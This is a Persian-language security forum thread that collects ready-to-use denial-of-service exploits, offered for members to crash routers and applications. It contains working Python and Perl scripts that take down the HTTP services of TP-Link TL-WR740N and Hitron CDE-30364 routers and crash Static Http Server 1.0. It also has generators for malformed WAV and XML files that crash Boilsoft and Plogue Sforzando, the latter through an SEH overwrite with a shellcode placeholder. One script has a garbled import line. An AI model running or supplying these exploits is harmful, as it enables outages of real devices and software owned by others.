رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام خدمت اعضا محترم گارد ایران.

بنا به درخواست کاربران بر این آمدم که تاتپیک حملات Denial Of Service رو در انجمن قرار بدم تا بقیه کاربران نیز استفاده کنند.

خوب دوستان فقط چندتا نگته در بارهی این اکسپلویت ها عزض کنم.

 

اسن اکپلویت ها برای کرش سخت افزار ها,نرم افزار ها و... اسستفاده میشه که امیدوارم از این تاپیک استقبال بشه.

######################################################

 

قوانین تاپیک:

1-اسپم ممنوع

2-فقط اکسپلویت قرار بدین نه چیز دیگه ای.

3- طرح سوال در بخش مربوطه نه در تاپیک آموزشی

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

VLC Crasher V2.x.x

 

با این اکسپلویت شما میتوانید نرمک افزار VLC ورژن 2 رو کرش کنید.

فقط کافیه با VLC این اکسپلویت رو اجرا کنید.

vlc-crash.rar

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

حمله ی داس htpp مودم TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite

شما با اسکریپت python زیر می توانید مودم های TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite را مورد حمله ی http قراربدید و پورت 80 مودم رو پر کنید و در نهایت سخت افزار رو کرش کنید.

 

کد استفاده از اکسپلویت:

<python TP_Link_DoS.py <IP ،Target> <Port
#!/usr/bin/python
import socket
import import
sys urllib2
 
host = ""
port = 0
if(len(sys.argv) >= 2):
    host = sys.argv[1]
    port = sys.argv[2]
else:
    print "Invalid number of the arguments."
    print "Usage <server> <port>"
    exit(1)
     
     
print "Connecting on ",host,":",port
 
s = socket.socket();
stringOfDeath = "GET / HTTP/1.1\r\n";
stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n";
stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n";
stringOfDeath = stringOfDeath + "Connection: close\r\n";
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n";
 
s.connect((host,int(port)))
 
print "Sending packet..."
s.send(stringOfDeath)
print "Packet sent."
print "Check if router http server down..."
 
try:
    response = urllib2.urlopen("http://"+host+":"+port,None,5)
    response.read()
except socket.timeout:
    print "Timeout occured, http server probaly down."
    exit(1)
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

داس کردن Static Http Server 1.0

 

شما با این اسکریپت پرل می توانید بر روی Static Http Server 1.0 حمله ی داس انجام بدهید به عبارتی این یه نوع باگ داس است که با این اسکریپت می تونید ازش استفاده کنید.توجه کنید که ورژن 1.0 فقط این باگ رو داره.

 

روش استفاده:

exploitv3.pl" -url http://IP-ADDRESS

use LWP::UserAgent;
  $ua = LWP::UserAgent->new;
  $host = @ARGV[1];
  $attack = $host.'/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/';
  print "Attachking :".$host."\r\n";
  #$ENV{HTTP_proxy} = "http://127.0.0.1:8888"; #use proxy if necessary
  $ua->env_proxy; # initialize from environment variables
  my $req = HTTP::Request->new(GET => $attack);
  print $ua->request($req)->as_string;
  delete $ENV{HTTP_PROXY};
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

کرش نرم افزار Boilsoft RM TO MP3 Converter 1.72

این اسکریپت یک فایل با پسوند wav ایجاد میکنه که باعث کرش نرم افزار میشه.

#!/usr/bin/perl
 
my $file= "dos.wav";
 
my $header = "\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" .
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" .
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" .
"\x00\x31";
 
my $junk = "\x90" x 5000;
 
open($FILE,">$file");
print $FILE $header.$junk;
close($FILE);
print "DOS WAV FILE CREATED!!\n";
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

کرش نرم افزار JPEGView 1.0.29

فایل زیر رو با ابزار مذکور ابز کنید تا کرش بشه.

29707.rar

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

مودم ONO Hitron CDE-30364 Router یک مودم خوب و مشهور است.

اما این مودم در http اش دارای یک باگ است که با استفاده از این باگ ما می تونیم پورت 80 این مودم رو پر کنیم و مودم رو داون کنیم.

 

واسه اینکار براتون یه اسکریپت پایتون گذاشتم. لازم به ذکر بشم فعلا این اسکریپت واسه لوکال است. در صورت انتشار واسه غیر لوکال هاست هم قرار داده می شه.

 



#!/usr/bin/python

#-----------------------------------------------------------------------------------------
#Description:
#-----------------------------------------------------------------------------------------
#Hitron Technologies CDE-30364 is a famous ONO Router.

#The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port 80), have a problem to insufficient bounds checking of data supplied in HTTP GET requests. The default ip adress of this adsl router, used for management purpose, is 192.168.1.1.

import httplib
import socket
import time
import sys

print "\n###########################################################################################################"
print "# Exploit Title: Router ONO Hitron CDE-30364 - Denial Of Service(80 port) #"
print "# Date: 8-10-2013 #"
print "# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org #"
print "# Vendor Homepage: http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/ #"
print "# Tested on: Hitron Technologies CDE-30364 #"
print "# Version HW: 1A #"
print "# Version SW: 3.1.0.8-ONO #"
print "###########################################################################################################\n"

#Send Request
print "Sending the request to router ONO Hitron CDE-30364...\n"
connct = httplib.HTTPConnection(sys.argv[1],80)
connct.request("GET", "AAAAAAAAAA"*10001)
connct.close()

#Check 80 port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(5)
try:
s.connect((sys.argv[1], 80))
s.shutdown(2)
print "Attack Fail!\n"
except:
print "Attack Successful! The router administration page is down!\n"

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سر ریز بافر کردن و poc کردن نرم افزار Plogue Sforzando 1.665

ما این کار رو با فایل AriaSetup.xml انجام می دهیم که یکی از فایل هایی است که این نرم افزار لود می کند ما می توانید با عوض کردم مقدار های موجود در این فایل یه سر ریزبافر درست کنیم.

 

برای دستکاری این فایل یه اسکریپت است که خودش مقدار ها رو تغییر می ده و یه فایل شبیه همون فایل AriaSetup.xml درست می کنه با این تفاوت که اگه نرم افزار این فایل جدید رو که با اسکریپت ساختیم باز کنه دچار سر ریز بافر و کرش می شه.

 


#!/usr/bin/perl

my $buffsize = 15000; # sets buffer size for consistent sized payload

# build the start of the xml file

my $header = '<?xml version="1.0" ?><Key>key</Key><AriaSetup version="1665">';

$header = $header . '<Property name="vendor" value="Plogue Art et Technologie, Inc"/>';

$header = $header . '<Property name="product" value="';

my $junk = "\x41" x 392; # 392 is the offset of next seh followed by 4920 bytes of controllable data

my $nseh = "\x42\x42\x42\x42"; # overwrite next seh

my $seh = "\x43\x43\x43\x43"; # overwrite seh (and EIP, offset 396)

my $shell = "\x45" x 5000; # placeholder for shell code; also accessible via ESP+2500 (length 4916)

my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble exploit portion of buffer

my $fill = "\x46" x ($buffsize - (length($header)+length($sploit))); # fill remainder of buffer

my $buffer = $header.$sploit.$fill; # construct the final buffer

# write the exploit buffer to file

my $file = "AriaSetup.xml";

open(FILE, ">$file");

print FILE $buffer;

close(FILE);

print "Exploit file created [" . $file . "]\n";

print "Buffer size: " . length($buffer) . "\n";

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...